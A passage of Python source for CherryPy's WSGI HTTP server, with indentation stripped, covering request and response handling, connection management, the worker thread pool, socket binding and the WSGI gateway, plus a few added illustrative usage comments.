if uri == ASTERISK:
return None, None, uri
scheme, sep, remainder = uri.partition(b'://')
if sep and QUESTION_MARK not in scheme:
# An absoluteURI.
# If there's a scheme (and it must be http or https), then:
# http_URL = "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]]
authority, path_a, path_b = remainder.partition(FORWARD_SLASH)
return scheme.lower(), authority, path_a+path_b
if uri.startswith(FORWARD_SLASH):
# An abs_path.
return None, None, uri
else:
# An authority.
return None, uri, None
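# Illustrative examples (sketch):
#   parse_request_uri(b"http://example.com/a?b=1") -> (b"http", b"example.com", b"/a?b=1")
#   parse_request_uri(b"/a?b=1")                   -> (None, None, b"/a?b=1")
#   parse_request_uri(b"*")                        -> (None, None, b"*")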
def unquote_bytes(self, path):
"""takes quoted string and unquotes % encoded values"""
res = path.split(b'%')
for i in range(1, len(res)):
item = res[i]
try:
res[i] = bytes([int(item[:2], 16)]) + item[2:]
except ValueError:
raise
return b''.join(res)
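# Illustrative example (sketch): unquote_bytes(b"/this%20path") -> b"/this path".
# Escaped slashes are deliberately preserved: read_request_line above splits on
# quoted_slash and re-joins with b"%2F", so b"/a%2Fb" keeps its encoded slash.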
def respond(self):
"""Call the gateway and write its iterable output."""
mrbs = self.server.max_request_body_size
if self.chunked_read:
self.rfile = ChunkedRFile(self.conn.rfile, mrbs)
else:
cl = int(self.inheaders.get(b"Content-Length", 0))
if mrbs and mrbs < cl:
if not self.sent_headers:
self.simple_response("413 Request Entity Too Large",
"The entity sent with the request exceeds the maximum "
"allowed bytes.")
return
self.rfile = KnownLengthRFile(self.conn.rfile, cl)
self.server.gateway(self).respond()
if (self.ready and not self.sent_headers):
self.sent_headers = True
self.send_headers()
if self.chunked_write:
self.conn.wfile.write(b"0\r\n\r\n")
def simple_response(self, status, msg=""):
"""Write a simple response back to the client."""
status = str(status)
buf = [bytes(self.server.protocol, "ascii") + SPACE +
bytes(status, "ISO-8859-1") + CRLF,
bytes("Content-Length: %s\r\n" % len(msg), "ISO-8859-1"),
b"Content-Type: text/plain\r\n"]
if status[:3] in ("413", "414"):
# Request Entity Too Large / Request-URI Too Long
self.close_connection = True
if self.response_protocol == 'HTTP/1.1':
# This will not be true for 414, since read_request_line
# usually raises 414 before reading the whole line, and we
# therefore cannot know the proper response_protocol.
buf.append(b"Connection: close\r\n")
else:
# HTTP/1.0 had no 413/414 status nor Connection header.
# Emit 400 instead and trust the message body is enough.
status = "400 Bad Request"
buf.append(CRLF)
if msg:
if isinstance(msg, unicodestr):
msg = msg.encode("ISO-8859-1")
buf.append(msg)
try:
self.conn.wfile.write(b"".join(buf))
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
def write(self, chunk):
"""Write unbuffered data to the client."""
if self.chunked_write and chunk:
buf = [bytes(hex(len(chunk)), 'ASCII')[2:], CRLF, chunk, CRLF]
self.conn.wfile.write(EMPTY.join(buf))
else:
self.conn.wfile.write(chunk)
def send_headers(self):
"""Assert, process, and send the HTTP response message-headers.
You must set self.status, and self.outheaders before calling this.
"""
hkeys = [key.lower() for key, value in self.outheaders]
status = int(self.status[:3])
if status == 413:
# Request Entity Too Large. Close conn to avoid garbage.
self.close_connection = True
elif b"content-length" not in hkeys:
# "All 1xx (informational), 204 (no content),
# and 304 (not modified) responses MUST NOT
# include a message-body." So no point chunking.
if status < 200 or status in (204, 205, 304):
pass
else:
if (self.response_protocol == 'HTTP/1.1'
and self.method != b'HEAD'):
# Use the chunked transfer-coding
self.chunked_write = True
self.outheaders.append((b"Transfer-Encoding", b"chunked"))
else:
# Closing the conn is the only way to determine len.
self.close_connection = True
if b"connection" not in hkeys:
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1 or better
if self.close_connection:
self.outheaders.append((b"Connection", b"close"))
else:
# Server and/or client are HTTP/1.0
if not self.close_connection:
self.outheaders.append((b"Connection", b"Keep-Alive"))
if (not self.close_connection) and (not self.chunked_read):
# Read any remaining request body data on the socket.
# "If an origin server receives a request that does not include an
# Expect request-header field with the "100-continue" expectation,
# the request includes a request body, and the server responds
# with a final status code before reading the entire request body
# from the transport connection, then the server SHOULD NOT close
# the transport connection until it has read the entire request,
# or until the client closes the connection. Otherwise, the client
# might not reliably receive the response message. However, this
# requirement is not to be construed as preventing a server from
# defending itself against denial-of-service attacks, or from
# badly broken client implementations."
remaining = getattr(self.rfile, 'remaining', 0)
if remaining > 0:
self.rfile.read(remaining)
if b"date" not in hkeys:
self.outheaders.append(
(b"Date", email.utils.formatdate(usegmt=True).encode('ISO-8859-1')))
if b"server" not in hkeys:
self.outheaders.append(
(b"Server", self.server.server_name.encode('ISO-8859-1')))
buf = [self.server.protocol.encode('ascii') + SPACE + self.status + CRLF]
for k, v in self.outheaders:
buf.append(k + COLON + SPACE + v + CRLF)
buf.append(CRLF)
self.conn.wfile.write(EMPTY.join(buf))
class NoSSLError(Exception):
"""Exception raised when a client speaks HTTP to an HTTPS socket."""
pass
class FatalSSLAlert(Exception):
"""Exception raised when the SSL implementation signals a fatal alert."""
pass
class CP_BufferedWriter(io.BufferedWriter):
"""Faux file object attached to a socket object."""
def write(self, b):
self._checkClosed()
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with self._write_lock:
self._write_buf.extend(b)
self._flush_unlocked()
return len(b)
def _flush_unlocked(self):
self._checkClosed("flush of closed file")
while self._write_buf:
try:
# ssl sockets only accept 'bytes', not bytearrays
# so perhaps we should conditionally wrap this for perf?
n = self.raw.write(bytes(self._write_buf))
except io.BlockingIOError as e:
n = e.characters_written
del self._write_buf[:n]
def CP_makefile(sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE):
if 'r' in mode:
return io.BufferedReader(socket.SocketIO(sock, mode), bufsize)
else:
return CP_BufferedWriter(socket.SocketIO(sock, mode), bufsize)
class HTTPConnection(object):
"""An HTTP connection (active socket).
server: the Server object which received this connection.
socket: the raw socket object (usually TCP) for this connection.
makefile: a fileobject class for reading from the socket.
"""
remote_addr = None
remote_port = None
ssl_env = None
rbufsize = DEFAULT_BUFFER_SIZE
wbufsize = DEFAULT_BUFFER_SIZE
RequestHandlerClass = HTTPRequest
def __init__(self, server, sock, makefile=CP_makefile):
self.server = server
self.socket = sock
self.rfile = makefile(sock, "rb", self.rbufsize)
self.wfile = makefile(sock, "wb", self.wbufsize)
self.requests_seen = 0
def communicate(self):
"""Read each request and respond appropriately."""
request_seen = False
try:
while True:
# (re)set req to None so that if something goes wrong in
# the RequestHandlerClass constructor, the error doesn't
# get written to the previous request.
req = None
req = self.RequestHandlerClass(self.server, self)
# This order of operations should guarantee correct pipelining.
req.parse_request()
if self.server.stats['Enabled']:
self.requests_seen += 1
if not req.ready:
# Something went wrong in the parsing (and the server has
# probably already made a simple_response). Return and
# let the conn close.
return
request_seen = True
req.respond()
if req.close_connection:
return
except socket.error:
e = sys.exc_info()[1]
errnum = e.args[0]
# sadly SSL sockets return a different (longer) time out string
if errnum == 'timed out' or errnum == 'The read operation timed out':
# Don't error if we're between requests; only error
# if 1) no request has been started at all, or 2) we're
# in the middle of a request.
# See http://www.cherrypy.org/ticket/853
if (not request_seen) or (req and req.started_request):
# Don't bother writing the 408 if the response
# has already started being written.
if req and not req.sent_headers:
try:
req.simple_response("408 Request Timeout")
except FatalSSLAlert:
# Close the connection.
return
elif errnum not in socket_errors_to_ignore:
self.server.error_log("socket.error %s" % repr(errnum),
level=logging.WARNING, traceback=True)
if req and not req.sent_headers:
try:
req.simple_response("500 Internal Server Error")
except FatalSSLAlert:
# Close the connection.
return
return
except (KeyboardInterrupt, SystemExit):
raise
except FatalSSLAlert:
# Close the connection.
return
except NoSSLError:
if req and not req.sent_headers:
# Unwrap our wfile
self.wfile = CP_makefile(self.socket._sock, "wb", self.wbufsize)
req.simple_response("400 Bad Request",
"The client sent a plain HTTP request, but "
"this server only speaks HTTPS on this port.")
self.linger = True
except Exception:
e = sys.exc_info()[1]
self.server.error_log(repr(e), level=logging.ERROR, traceback=True)
if req and not req.sent_headers:
try:
req.simple_response("500 Internal Server Error")
except FatalSSLAlert:
# Close the connection.
return
linger = False
def close(self):
"""Close the socket underlying this connection."""
self.rfile.close()
if not self.linger:
# Python's socket module does NOT call close on the kernel socket
# when you call socket.close(). We do so manually here because we
# want this server to send a FIN TCP segment immediately. Note this
# must be called *before* calling socket.close(), because the latter
# drops its reference to the kernel socket.
# Python 3 *probably* fixed this with socket._real_close; hard to tell.
## self.socket._sock.close()
self.socket.close()
else:
# On the other hand, sometimes we want to hang around for a bit
# to make sure the client has a chance to read our entire
# response. Skipping the close() calls here delays the FIN
# packet until the socket object is garbage-collected later.
# Someday, perhaps, we'll do the full lingering_close that
# Apache does, but not today.
pass
class TrueyZero(object):
"""An object which equals and does math like the integer '0' but evals True."""
def __add__(self, other):
return other
def __radd__(self, other):
return other
trueyzero = TrueyZero()
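# Illustrative example: trueyzero + 5 == 5 == 5 + trueyzero, while
# bool(trueyzero) is True, letting the worker stats lambdas below report a
# value that counts as "present" but adds nothing to running totals.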
_SHUTDOWNREQUEST = None
class WorkerThread(threading.Thread):
"""Thread which continuously polls a Queue for Connection objects.
Due to the timing issues of polling a Queue, a WorkerThread does not
check its own 'ready' flag after it has started. To stop the thread,
it is necessary to stick a _SHUTDOWNREQUEST object onto the Queue
(one for each running WorkerThread).
"""
conn = None
"""The current connection pulled off the Queue, or None."""
server = None
"""The HTTP Server which spawned this thread, and which owns the
Queue and is placing active connections into it."""
ready = False
"""A simple flag for the calling server to know when this thread
has begun polling the Queue."""
def __init__(self, server):
self.ready = False
self.server = server
self.requests_seen = 0
self.bytes_read = 0
self.bytes_written = 0
self.start_time = None
self.work_time = 0
self.stats = {
'Requests': lambda s: self.requests_seen + ((self.start_time is None) and trueyzero or self.conn.requests_seen),
'Bytes Read': lambda s: self.bytes_read + ((self.start_time is None) and trueyzero or self.conn.rfile.bytes_read),
'Bytes Written': lambda s: self.bytes_written + ((self.start_time is None) and trueyzero or self.conn.wfile.bytes_written),
'Work Time': lambda s: self.work_time + ((self.start_time is None) and trueyzero or time.time() - self.start_time),
'Read Throughput': lambda s: s['Bytes Read'](s) / (s['Work Time'](s) or 1e-6),
'Write Throughput': lambda s: s['Bytes Written'](s) / (s['Work Time'](s) or 1e-6),
}
threading.Thread.__init__(self)
def run(self):
self.server.stats['Worker Threads'][self.getName()] = self.stats
try:
self.ready = True
while True:
conn = self.server.requests.get()
if conn is _SHUTDOWNREQUEST:
return
self.conn = conn
if self.server.stats['Enabled']:
self.start_time = time.time()
try:
conn.communicate()
finally:
conn.close()
if self.server.stats['Enabled']:
self.requests_seen += self.conn.requests_seen
self.bytes_read += self.conn.rfile.bytes_read
self.bytes_written += self.conn.wfile.bytes_written
self.work_time += time.time() - self.start_time
self.start_time = None
self.conn = None
except (KeyboardInterrupt, SystemExit):
exc = sys.exc_info()[1]
self.server.interrupt = exc
class ThreadPool(object):
"""A Request Queue for an HTTPServer which pools threads.
ThreadPool objects must provide min, get(), put(obj), start()
and stop(timeout) attributes.
"""
def __init__(self, server, min=10, max=-1):
self.server = server
self.min = min
self.max = max
self._threads = []
self._queue = queue.Queue()
self.get = self._queue.get
def start(self):
"""Start the pool of threads."""
for i in range(self.min):
self._threads.append(WorkerThread(self.server))
for worker in self._threads:
worker.setName("CP Server " + worker.getName())
worker.start()
for worker in self._threads:
while not worker.ready:
time.sleep(.1)
def _get_idle(self):
"""Number of worker threads which are idle. Read-only."""
return len([t for t in self._threads if t.conn is None])
idle = property(_get_idle, doc=_get_idle.__doc__)
def put(self, obj):
self._queue.put(obj)
if obj is _SHUTDOWNREQUEST:
return
def grow(self, amount):
"""Spawn new worker threads (not above self.max)."""
for i in range(amount):
if self.max > 0 and len(self._threads) >= self.max:
break
worker = WorkerThread(self.server)
worker.setName("CP Server " + worker.getName())
self._threads.append(worker)
worker.start()
def shrink(self, amount):
"""Kill off worker threads (not below self.min)."""
# Grow/shrink the pool if necessary.
# Remove any dead threads from our list
for t in self._threads:
if not t.isAlive():
self._threads.remove(t)
amount -= 1
if amount > 0:
for i in range(min(amount, len(self._threads) - self.min)):
# Put a number of shutdown requests on the queue equal
# to 'amount'. Once each of those is processed by a worker,
# that worker will terminate and be culled from our list
# in self.put.
self._queue.put(_SHUTDOWNREQUEST)
def stop(self, timeout=5):
# Must shut down threads here so the code that calls
# this method can know when all threads are stopped.
for worker in self._threads:
self._queue.put(_SHUTDOWNREQUEST)
# Don't join currentThread (when stop is called inside a request).
current = threading.currentThread()
if timeout and timeout >= 0:
endtime = time.time() + timeout
while self._threads:
worker = self._threads.pop()
if worker is not current and worker.isAlive():
try:
if timeout is None or timeout < 0:
worker.join()
else:
remaining_time = endtime - time.time()
if remaining_time > 0:
worker.join(remaining_time)
if worker.isAlive():
# We exhausted the timeout.
# Forcibly shut down the socket.
c = worker.conn
if c and not c.rfile.closed:
try:
c.socket.shutdown(socket.SHUT_RD)
except TypeError:
# pyOpenSSL sockets don't take an arg
c.socket.shutdown()
worker.join()
except (AssertionError,
# Ignore repeated Ctrl-C.
# See http://www.cherrypy.org/ticket/691.
KeyboardInterrupt):
pass
def _get_qsize(self):
return self._queue.qsize()
qsize = property(_get_qsize)
try:
import fcntl
except ImportError:
try:
from ctypes import windll, WinError
except ImportError:
def prevent_socket_inheritance(sock):
"""Dummy function, since neither fcntl nor ctypes are available."""
pass
else:
def prevent_socket_inheritance(sock):
"""Mark the given socket fd as non-inheritable (Windows)."""
if not windll.kernel32.SetHandleInformation(sock.fileno(), 1, 0):
raise WinError()
else:
def prevent_socket_inheritance(sock):
"""Mark the given socket fd as non-inheritable (POSIX)."""
fd = sock.fileno()
old_flags = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, old_flags | fcntl.FD_CLOEXEC)
class SSLAdapter(object):
"""Base class for SSL driver library adapters.
Required methods:
* ``wrap(sock) -> (wrapped socket, ssl environ dict)``
* ``makefile(sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE) -> socket file object``
"""
def __init__(self, certificate, private_key, certificate_chain=None):
self.certificate = certificate
self.private_key = private_key
self.certificate_chain = certificate_chain
def wrap(self, sock):
raise NotImplementedError
def makefile(self, sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE):
raise NotImplementedError
class HTTPServer(object):
"""An HTTP server."""
_bind_addr = "127.0.0.1"
_interrupt = None
gateway = None
"""A Gateway instance."""
minthreads = None
"""The minimum number of worker threads to create (default 10)."""
maxthreads = None
"""The maximum number of worker threads to create (default -1 = no limit)."""
server_name = None
"""The name of the server; defaults to socket.gethostname()."""
protocol = "HTTP/1.1"
"""The version string to write in the Status-Line of all HTTP responses.
For example, "HTTP/1.1" is the default. This also limits the supported
features used in the response."""
request_queue_size = 5
"""The 'backlog' arg to socket.listen(); max queued connections (default 5)."""
shutdown_timeout = 5
"""The total time, in seconds, to wait for worker threads to cleanly exit."""
timeout = 10
"""The timeout in seconds for accepted connections (default 10)."""
version = "CherryPy/3.2.2"
"""A version string for the HTTPServer."""
software = None
"""The value to set for the SERVER_SOFTWARE entry in the WSGI environ.
If None, this defaults to ``'%s Server' % self.version``."""
ready = False
"""An internal flag which marks whether the socket is accepting connections."""
max_request_header_size = 0
"""The maximum size, in bytes, for request headers, or 0 for no limit."""
max_request_body_size = 0
"""The maximum size, in bytes, for request bodies, or 0 for no limit."""
nodelay = True
"""If True (the default since 3.1), sets the TCP_NODELAY socket option."""
ConnectionClass = HTTPConnection
"""The class to use for handling HTTP connections."""
ssl_adapter = None
"""An instance of SSLAdapter (or a subclass).
You must have the corresponding SSL driver library installed."""
def __init__(self, bind_addr, gateway, minthreads=10, maxthreads=-1,
server_name=None):
self.bind_addr = bind_addr
self.gateway = gateway
self.requests = ThreadPool(self, min=minthreads or 1, max=maxthreads)
if not server_name:
server_name = socket.gethostname()
self.server_name = server_name
self.clear_stats()
def clear_stats(self):
self._start_time = None
self._run_time = 0
self.stats = {
'Enabled': False,
'Bind Address': lambda s: repr(self.bind_addr),
'Run time': lambda s: (not s['Enabled']) and -1 or self.runtime(),
'Accepts': 0,
'Accepts/sec': lambda s: s['Accepts'] / self.runtime(),
'Queue': lambda s: getattr(self.requests, "qsize", None),
'Threads': lambda s: len(getattr(self.requests, "_threads", [])),
'Threads Idle': lambda s: getattr(self.requests, "idle", None),
'Socket Errors': 0,
'Requests': lambda s: (not s['Enabled']) and -1 or sum([w['Requests'](w) for w
in s['Worker Threads'].values()], 0),
'Bytes Read': lambda s: (not s['Enabled']) and -1 or sum([w['Bytes Read'](w) for w
in s['Worker Threads'].values()], 0),
'Bytes Written': lambda s: (not s['Enabled']) and -1 or sum([w['Bytes Written'](w) for w
in s['Worker Threads'].values()], 0),
'Work Time': lambda s: (not s['Enabled']) and -1 or sum([w['Work Time'](w) for w
in s['Worker Threads'].values()], 0),
'Read Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Read'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0),
'Write Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Written'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0),
'Worker Threads': {},
}
logging.statistics["CherryPy HTTPServer %d" % id(self)] = self.stats
def runtime(self):
if self._start_time is None:
return self._run_time
else:
return self._run_time + (time.time() - self._start_time)
def __str__(self):
return "%s.%s(%r)" % (self.__module__, self.__class__.__name__,
self.bind_addr)
def _get_bind_addr(self):
return self._bind_addr
def _set_bind_addr(self, value):
if isinstance(value, tuple) and value[0] in ('', None):
# Despite the socket module docs, using '' does not
# allow AI_PASSIVE to work. Passing None instead
# returns '0.0.0.0' like we want. In other words:
# host AI_PASSIVE result
# '' Y 192.168.x.y
# '' N 192.168.x.y
# None Y 0.0.0.0
# None N 127.0.0.1
# But since you can get the same effect with an explicit
# '0.0.0.0', we deny both the empty string and None as values.
raise ValueError("Host values of '' or None are not allowed. "
"Use '0.0.0.0' (IPv4) or '::' (IPv6) instead "
"to listen on all active interfaces.")
self._bind_addr = value
bind_addr = property(_get_bind_addr, _set_bind_addr,
doc="""The interface on which to listen for connections.
For TCP sockets, a (host, port) tuple. Host values may be any IPv4
or IPv6 address, or any valid hostname. The string 'localhost' is a
synonym for '127.0.0.1' (or '::1', if your hosts file prefers IPv6).
The string '0.0.0.0' is a special IPv4 entry meaning "any active
interface" (INADDR_ANY), and '::' is the similar IN6ADDR_ANY for
IPv6. The empty string or None are not allowed.
For UNIX sockets, supply the filename as a string.""")
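# Illustrative bind_addr values per the docstring above (a sketch, not from
# the original source):
#   server.bind_addr = ('127.0.0.1', 8080)   # one IPv4 interface
#   server.bind_addr = ('::', 8080)          # all interfaces via IN6ADDR_ANY
#   server.bind_addr = '/var/run/app.sock'   # an AF_UNIX socket file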
def start(self):
"""Run the server forever."""
# We don't have to trap KeyboardInterrupt or SystemExit here,
# because cherrypy.server already does so, calling self.stop() for us.
# If you're using this server with another framework, you should
# trap those exceptions in whatever code block calls start().
self._interrupt = None
if self.software is None:
self.software = "%s Server" % self.version
# Select the appropriate socket
if isinstance(self.bind_addr, basestring):
# AF_UNIX socket
# So we can reuse the socket...
try: os.unlink(self.bind_addr)
except OSError: pass
# So everyone can access the socket...
try: os.chmod(self.bind_addr, 511) # 0777
except OSError: pass
info = [(socket.AF_UNIX, socket.SOCK_STREAM, 0, "", self.bind_addr)]
else:
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6 addresses)
host, port = self.bind_addr
try:
info = socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE)
except socket.gaierror:
if ':' in self.bind_addr[0]:
info = [(socket.AF_INET6, socket.SOCK_STREAM,
0, "", self.bind_addr + (0, 0))]
else:
info = [(socket.AF_INET, socket.SOCK_STREAM,
0, "", self.bind_addr)]
self.socket = None
msg = "No socket could be created"
for res in info:
af, socktype, proto, canonname, sa = res
try:
self.bind(af, socktype, proto)
except socket.error:
if self.socket:
self.socket.close()
self.socket = None
continue
break
if not self.socket:
raise socket.error(msg)
# Timeout so KeyboardInterrupt can be caught on Win32
self.socket.settimeout(1)
self.socket.listen(self.request_queue_size)
# Create worker threads
self.requests.start()
self.ready = True
self._start_time = time.time()
while self.ready:
try:
self.tick()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.error_log("Error in HTTPServer.tick", level=logging.ERROR,
traceback=True)
if self.interrupt:
while self.interrupt is True:
# Wait for self.stop() to complete. See _set_interrupt.
time.sleep(0.1)
if self.interrupt:
raise self.interrupt
def error_log(self, msg="", level=20, traceback=False):
# Override this in subclasses as desired
sys.stderr.write(msg + '\n')
sys.stderr.flush()
if traceback:
tblines = format_exc()
sys.stderr.write(tblines)
sys.stderr.flush()
def bind(self, family, type, proto=0):
"""Create (or recreate) the actual socket object."""
self.socket = socket.socket(family, type, proto)
prevent_socket_inheritance(self.socket)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.nodelay and not isinstance(self.bind_addr, str):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if self.ssl_adapter is not None:
self.socket = self.ssl_adapter.bind(self.socket)
# If listening on the IPV6 any address ('::' = IN6ADDR_ANY),
# activate dual-stack. See http://www.cherrypy.org/ticket/871.
if (hasattr(socket, 'AF_INET6') and family == socket.AF_INET6
and self.bind_addr[0] in ('::', '::0', '::0.0.0.0')):
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
# Apparently, the socket option is not available in
# this machine's TCP stack
pass
self.socket.bind(self.bind_addr)
def tick(self):
"""Accept a new connection and put it on the Queue."""
try:
s, addr = self.socket.accept()
if self.stats['Enabled']:
self.stats['Accepts'] += 1
if not self.ready:
return
prevent_socket_inheritance(s)
if hasattr(s, 'settimeout'):
s.settimeout(self.timeout)
makefile = CP_makefile
ssl_env = {}
# if ssl cert and key are set, we try to be a secure HTTP server
if self.ssl_adapter is not None:
try:
s, ssl_env = self.ssl_adapter.wrap(s)
except NoSSLError:
msg = ("The client sent a plain HTTP request, but "
"this server only speaks HTTPS on this port.")
buf = ["%s 400 Bad Request\r\n" % self.protocol,
"Content-Length: %s\r\n" % len(msg),
"Content-Type: text/plain\r\n\r\n",
msg]
wfile = makefile(s, "wb", DEFAULT_BUFFER_SIZE)
try:
wfile.write("".join(buf).encode('ISO-8859-1'))
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
return
if not s:
return
makefile = self.ssl_adapter.makefile
# Re-apply our timeout since we may have a new socket object
if hasattr(s, 'settimeout'):
s.settimeout(self.timeout)
conn = self.ConnectionClass(self, s, makefile)
if not isinstance(self.bind_addr, basestring):
# optional values
# Until we do DNS lookups, omit REMOTE_HOST
if addr is None: # sometimes this can happen
# figure out if AF_INET or AF_INET6.
if len(s.getsockname()) == 2:
# AF_INET
addr = ('0.0.0.0', 0)
else:
# AF_INET6
addr = ('::', 0)
conn.remote_addr = addr[0]
conn.remote_port = addr[1]
conn.ssl_env = ssl_env
self.requests.put(conn)
except socket.timeout:
# The only reason for the timeout in start() is so we can
# notice keyboard interrupts on Win32, which don't interrupt
# accept() by default
return
except socket.error:
x = sys.exc_info()[1]
if self.stats['Enabled']:
self.stats['Socket Errors'] += 1
if x.args[0] in socket_error_eintr:
# I *think* this is right. EINTR should occur when a signal
# is received during the accept() call; all docs say retry
# the call, and I *think* I'm reading it right that Python
# will then go ahead and poll for and handle the signal
# elsewhere. See http://www.cherrypy.org/ticket/707.
return
if x.args[0] in socket_errors_nonblocking:
# Just try again. See http://www.cherrypy.org/ticket/479.
return
if x.args[0] in socket_errors_to_ignore:
# Our socket was closed.
# See http://www.cherrypy.org/ticket/686.
return
raise
def _get_interrupt(self):
return self._interrupt
def _set_interrupt(self, interrupt):
self._interrupt = True
self.stop()
self._interrupt = interrupt
interrupt = property(_get_interrupt, _set_interrupt,
doc="Set this to an Exception instance to "
"interrupt the server.")
def stop(self):
"""Gracefully shutdown a server that is serving forever."""
self.ready = False
if self._start_time is not None:
self._run_time += (time.time() - self._start_time)
self._start_time = None
sock = getattr(self, "socket", None)
if sock:
if not isinstance(self.bind_addr, basestring):
# Touch our own socket to make accept() return immediately.
try:
host, port = sock.getsockname()[:2]
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
# Changed to use error code and not message
# See http://www.cherrypy.org/ticket/860.
raise
else:
# Note that we're explicitly NOT using AI_PASSIVE,
# here, because we want an actual IP to touch.
# localhost won't work if we've bound to a public IP,
# but it will if we bound to '0.0.0.0' (INADDR_ANY).
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
if hasattr(sock, "close"):
sock.close()
self.socket = None
self.requests.stop(self.shutdown_timeout)
class Gateway(object):
"""A base class to interface HTTPServer with other systems, such as WSGI."""
def __init__(self, req):
self.req = req
def respond(self):
"""Process the current request. Must be overridden in a subclass."""
raise NotImplementedError
# These may either be wsgiserver.SSLAdapter subclasses or the string names
# of such classes (in which case they will be lazily loaded).
ssl_adapters = {
'builtin': 'cherrypy.wsgiserver.ssl_builtin.BuiltinSSLAdapter',
}
def get_ssl_adapter_class(name='builtin'):
"""Return an SSL adapter class for the given name."""
adapter = ssl_adapters[name.lower()]
if isinstance(adapter, basestring):
last_dot = adapter.rfind(".")
attr_name = adapter[last_dot + 1:]
mod_path = adapter[:last_dot]
try:
mod = sys.modules[mod_path]
if mod is None:
raise KeyError()
except KeyError:
# The last [''] is important.
mod = __import__(mod_path, globals(), locals(), [''])
# Let an AttributeError propagate outward.
try:
adapter = getattr(mod, attr_name)
except AttributeError:
raise AttributeError("'%s' object has no attribute '%s'"
% (mod_path, attr_name))
return adapter
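# Hedged usage sketch (illustrative, not part of the original module): resolve
# the builtin adapter and instantiate it. The certificate paths are
# placeholders, and the argument order is assumed from the SSLAdapter base
# class fields (certificate, private_key, certificate_chain).
def _example_get_ssl_adapter():
    cls = get_ssl_adapter_class('builtin')
    return cls('/path/to/cert.pem', '/path/to/privkey.pem')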
# -------------------------------- WSGI Stuff -------------------------------- #
class CherryPyWSGIServer(HTTPServer):
"""A subclass of HTTPServer which calls a WSGI application."""
wsgi_version = (1, 0)
"""The version of WSGI to produce."""
def __init__(self, bind_addr, wsgi_app, numthreads=10, server_name=None,
max=-1, request_queue_size=5, timeout=10, shutdown_timeout=5):
self.requests = ThreadPool(self, min=numthreads or 1, max=max)
self.wsgi_app = wsgi_app
self.gateway = wsgi_gateways[self.wsgi_version]
self.bind_addr = bind_addr
if not server_name:
server_name = socket.gethostname()
self.server_name = server_name
self.request_queue_size = request_queue_size
self.timeout = timeout
self.shutdown_timeout = shutdown_timeout
self.clear_stats()
def _get_numthreads(self):
return self.requests.min
def _set_numthreads(self, value):
self.requests.min = value
numthreads = property(_get_numthreads, _set_numthreads)
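# Hedged usage sketch (illustrative, not part of the original module): serve a
# trivial WSGI app. start() blocks until interrupted, so stop() is called from
# the KeyboardInterrupt handler, as the start() docstring above recommends.
def _example_serve_wsgi():
    def app(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return ['Hello, world!']
    server = CherryPyWSGIServer(('127.0.0.1', 8080), app, numthreads=10)
    try:
        server.start()
    except KeyboardInterrupt:
        server.stop()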
class WSGIGateway(Gateway):
"""A base class to interface HTTPServer with WSGI."""
def __init__(self, req):
self.req = req
self.started_response = False
self.env = self.get_environ()
self.remaining_bytes_out = None
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
raise NotImplementedError
def respond(self):
"""Process the current request."""
response = self.req.server.wsgi_app(self.env, self.start_response)
try:
for chunk in response:
# "The start_response callable must not actually transmit
# the response headers. Instead, it must store them for the
# server or gateway to transmit only after the first
# iteration of the application return value that yields
# a NON-EMPTY string, or upon the application's first
# invocation of the write() callable." (PEP 333)
if chunk:
if isinstance(chunk, unicodestr):
chunk = chunk.encode('ISO-8859-1')
self.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
def start_response(self, status, headers, exc_info = None):
"""WSGI callable to begin the HTTP response."""
# "The application may call start_response more than once,
# if and only if the exc_info argument is provided."
if self.started_response and not exc_info:
raise AssertionError("WSGI start_response called a second "
"time with no exc_info.")
self.started_response = True
# "if exc_info is provided, and the HTTP headers have already been
# sent, start_response must raise an error, and should raise the
# exc_info tuple."
if self.req.sent_headers:
try:
raise exc_info[0](exc_info[1]).with_traceback(exc_info[2])
finally:
exc_info = None
# According to PEP 3333, when using Python 3, the response status
# and headers must be bytes masquerading as unicode; that is, they
# must be of type "str" but are restricted to code points in the
# "latin-1" set.
if not isinstance(status, str):
raise TypeError("WSGI response status is not of type str.")
self.req.status = status.encode('ISO-8859-1')
for k, v in headers:
if not isinstance(k, str):
raise TypeError("WSGI response header key %r is not of type str." % k)
if not isinstance(v, str):
raise TypeError("WSGI response header value %r is not of type str." % v)
if k.lower() == 'content-length':
self.remaining_bytes_out = int(v)
self.req.outheaders.append((k.encode('ISO-8859-1'), v.encode('ISO-8859-1')))
return self.write
def write(self, chunk):
"""WSGI callable to write unbuffered data to the client.
This method is also used internally by start_response (to write
data from the iterable returned by the WSGI application).
"""
if not self.started_response:
raise AssertionError("WSGI write called before start_response.")
chunklen = len(chunk)
rbo = self.remaining_bytes_out
if rbo is not None and chunklen > rbo:
if not self.req.sent_headers:
